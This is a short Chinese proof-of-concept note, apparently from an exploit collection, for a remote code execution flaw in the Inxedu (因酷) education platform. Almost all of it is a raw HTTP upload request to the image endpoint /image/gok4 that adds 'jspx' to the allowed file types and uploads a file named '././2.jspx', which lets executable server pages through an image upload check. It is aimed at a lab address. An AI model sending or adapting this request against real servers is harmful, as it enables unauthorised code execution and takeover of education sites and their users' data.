Y39-2因酷-教育平台-RCE

漏洞复现：

payload：

POST /image/gok4?&param=image&fileType=jpg,gif,png,jpeg,jspx&pressText=undefined HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------308436435515370414691526924874
Content-Length: 2853
Origin: http://192.168.3.102:8080
Connection: close
Referer: http://192.168.3.102:8080/admin/website/doUpdateImages/309
Upgrade-Insecure-Requests: 1
Priority: u=4

-----------------------------308436435515370414691526924874
Content-Disposition: form-data; name="uploadfile"; filename="././2.jspx"
Content-Type: image/jpeg

123
-----------------------------308436435515370414691526924874--